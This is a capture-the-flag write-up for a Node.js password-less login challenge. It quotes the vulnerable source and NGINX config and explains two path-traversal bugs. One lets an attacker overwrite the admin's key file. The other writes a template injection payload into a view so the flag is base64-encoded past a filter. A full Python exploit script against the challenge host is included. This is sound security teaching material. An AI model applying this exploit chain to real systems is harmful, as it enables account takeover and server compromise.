The technology is always evolving, so why do we still stick with password-based authentication? That makes no sense! That’s why I designed my own password-less login system. I even open-sourced it for everyone interested, how nice of me!
const sqlite = require("better-sqlite3");
const path = require("path");
const crypto = require("crypto")
const fs = require("fs");
const db = new sqlite(":memory:");
db.exec(`
DROP TABLE IF EXISTS users;
CREATE TABLE IF NOT EXISTS users (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
username VARCHAR(255) NOT NULL UNIQUE,
admin INTEGER NOT NULL
)
`);
register("jimmy_jammy", 1);
function register(username, admin = 0) {
try {
db.prepare("INSERT INTO users (username, admin) VALUES (?, ?)").run(username, admin);
} catch {
return { success: false, data: "Username already taken" }
}
const key_path = path.join(__dirname, "keys", username + ".key");
const contents = crypto.randomBytes(1024);
fs.writeFileSync(key_path, contents);
return { success: true, data: key_path };
}
function login(username, key) {
const user = db.prepare("SELECT * FROM users WHERE username = ?").get(username);
if (!user) return { success: false, data: "User does not exist" };
if (key.length !== 1024) return { success: false, data: "Invalid access key" };
const key_path = path.join(__dirname, "keys", username + ".key");
if (key.compare(fs.readFileSync(key_path)) !== 0) return { success: false, data: "Wrong access key" };
return { success: true, data: user };
}
module.exports = { register, login };
NGINX configuration
server {
listen 80 default_server;
listen [::]:80 default_server;
server_name _;
location / {
# Replace the flag so nobody steals it!
sub_filter 'placeholder_for_flag' 'oof, that was close, glad i was here to save the day';
sub_filter_once off;
proxy_pass http://localhost:3000;
}
}
Analyzing index.js
The index.js requires util.js file.
The endpoint /register requires a username only and returns a key for authentication.
The endpoint /login requires a username and a key file.
The flag passed to article.ejs view res.render("article", { article: article, session: req.session, flag: process.env.FLAG });.
The flag is not rendered via /article endpoint based on the content of the article.ejs.
The flag passed to edit.js view res.render("edit", { article: article, session: req.session, flag: process.env.FLAG });.
The flag is rendered via GET/edit?id=<INTEGER> endpoint based on the content of the edit.ejs: <p class="mb-5 text-center"><%= flag %></p>
The endpoint /edit requires an admin session if (!req.session.admin) return res.sendStatus(401); for both methods GET and POST.
The POST endpoint /edit?id=<string> is vulnerable, where you could path traverse via the id parameter ./articles/<id> and write content to the traversal path via the article POST parameter. fs.writeFileSync(path.join("articles", req.query.id), req.body.article.replace(/\r/g, ""));
Analyzing utils.js
the utils file registered an administrator user with jimmy_jammy as a username and a random key with 1024 bytes register("jimmy_jammy", 1);.
the register function is vulnerable to account takeover, where you could traversal and overwrite an existing user's key.
the flag is replaced with oof, that was close, glad i was here to save the day via NGINX sub_filter.
The ngx_http_sub_module module is a filter that modifies a response by replacing one specified string by another.
This module is not built by default, it should be enabled with the --with-http_sub_module configuration parameter.
Exploitation
Register ./jimmy_jammy to overwrite the actual jimmy_jammy key.
Login with jimmy_jammy and use the key that we obtained via the registration function.
Edit the edit.js view to <%= btoa(flag) %> which encodes the flag to base64 via POST/edit?id=../views/edit.jsarticle=<%25%3d+btoa(flag)+%25> to bypass the NGINX sub_filter.
from requests import get, post, Session
session = Session()
url = 'https://blackhat4-48f58fefc9582c2fac90f05e4182f191-0.chals.bh.ctf.sa'
username = 'jimmy_jammy'
# register
endpoint = '/register'
data = { 'username': f'./{username}' }
key = post(url + endpoint, data = data).content
files = { 'key': (f'{username}.key', key, 'application/vnd.apple.keynote') }
# login
endpoint = '/login'
data = { 'username': username }
session.post(url + endpoint, files = files, data = data)
# overwrite the edit.ejs view
endpoint = '/edit'
params = { 'id': '../views/edit.ejs' }
data = { 'article': '<%= btoa(flag) %>' }
session.post(url + endpoint, data = data, params = params)
# get the flag
endpoint = '/edit'
params = { 'id': '1' }
flag = session.get(url + endpoint, params = params).text
The flag
Navigate to the endpoint /edit?id=1 to get the base64 flag
from base64 import b64decode
b64decode(flag).decode()
